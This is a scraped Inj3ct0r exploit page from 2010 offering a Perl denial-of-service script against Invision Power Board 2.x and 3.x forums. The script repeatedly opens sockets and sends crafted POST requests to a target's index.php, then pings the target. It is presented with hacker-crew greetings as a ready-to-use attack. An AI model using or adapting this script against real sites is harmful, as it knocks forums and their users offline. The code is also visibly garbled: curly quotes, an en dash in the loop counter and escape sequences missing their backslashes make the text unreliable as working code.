Invision power board 2.x 3.x 0-day DDOS
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Invision power board 2.x 3.x 0-day DDOS</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================
Invision power board 2.x 3.x 0-day DDOS
=======================================
The largest Exploit Database in the world !
# 2.x 3.x are effected
# Thanks to Inj3ct0r Cr3w
# Greetz to R0073r Sid3^effects L0rd CrusAd3r The Exploited Sn!per SONiC
#Perl Script
#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0 _ __ __ __ 1
#1 /’ __ /’__` / __ /’__` 0
#0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
#1 /_/ /’ _ ` / /_/__<_ /’___ / /`’__ 0
#0 / / / / __/ _ _ / 1
#1 _ _ __ ____/ ____\ __\ ____/ _ 0
#0 /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ 1
#1 ____/ >> Exploit database separated by exploit 0
#0 /___/ type (local, remote, DoS, etc.) 1
#1 1
#0 [+] Site : Inj3ct0r.com 0
#1 [+] Support e-mail : submit[at]inj3ct0r.com 1
#0 0
#1 #################################### 1
#0 I’m SeeMe member from Inj3ct0r Team 1
#1 #################################### 0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http://)//eg;
for ($i=0; $i<10; $i–)
{
$user="seeme".$rand.$i;
$data = "act=idx&wwo="
;
$len = length $data;
$foo = "POST ".$dir."index.php HTTP/1.1rn".
"Accept: * /*rn".
"Accept-Language: en-gbrn".
"Content-Type: application/x-www-form-urlencodedrn".
"Accept-Encoding: gzip, deflatern".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)rn".
"Host: $hostrn".
"Content-Length: $lenrn".
"Connection: Keep-Alivern".
"Cache-Control: no-cachernrn".
"$data";
my $port = "80";
my $proto = getprotobyname(‘tcp’);
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "nn";
system(‘ping $host’);
sub usage {
print "tusage: n";
print "t$0 n";
print "tex: $0 127.0.0.1 /forum/n";
print "tex2: $0 127.0.0.1 /nn";
exit();
};
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-16]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13357
Leave a Reply